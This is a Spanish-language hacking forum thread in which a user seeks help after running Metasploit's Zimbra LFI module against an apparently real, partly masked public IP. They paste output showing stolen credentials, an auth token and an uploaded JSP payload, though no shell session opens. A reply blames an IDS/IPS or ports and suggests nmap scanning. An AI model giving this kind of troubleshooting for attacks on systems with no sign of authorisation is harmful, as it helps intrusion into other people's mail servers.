[SOLUCIONADO] Metasploit - Exploit zimbra

Iniciado por Gyprus, Junio 13, 2014, 12:34:33 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Junio 13, 2014, 12:34:33 PM Ultima modificación: Septiembre 02, 2014, 04:07:13 PM por Expermicid
Exploit: exploit/unix/webapp/zimbra_lfi

RHOST: la ip al que voy a "atacar"
LHOST: ip local de la maquina virtual
puertos: Default RPORT : 7071 y Local: 4444

Y lo que me pasa es esto:

  • 200..x.xx.x.x:7071 - Getting login credentials...
  • 200.xx.xxx.xx:7071 - Got login credentials!
  • 200.xx.x.xx.x:7071 - Getting auth token...
  • No tienes permitido ver enlaces. Registrate o Entra a tu cuenta:7071 - Got auth token!
  • 200.xx.xx.x.x.x:7071 - Uploading payload
  • 200.xx.x.x.xx:7071 - Uploading jsp stager
  • 200.xx.xx.x.x:7071 - Executing payload on /downloads/dwZUmvrbqpKCV.jsp
    [!] This exploit may require manual cleanup of '../jetty/webapps/zimbra/downloads/dwZUmvrbqpKCV.jsp' on the target
    [!] This exploit may require manual cleanup of '../jetty/webapps/zimbra/downloads/nCFqzvYjOAFiS' on the target
    msf exploit(zimbra_lfi) >

    Y que ahí supuestamente tendria que salir la session pero eso no pasa. Creo que puede ser un error de puertos ,dmz o bien el host no es vuln. Ayuda? :P Desde ya muchas gracias
Junio 14, 2014, 04:35:57 PM #1
Que te hace creer que el servidor es Vulnerable?

Puede andar de por medio algun amiguito IDS, IPS el cual esta obstruyendo, como tambien el puerto :) le pasaste un nmap o alguna herramienta parecida, para identificar puertos vulnerablidades?

Regards,
Snifer
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!


Imprimir
Ir Arriba Páginas1
Acciones del Usuario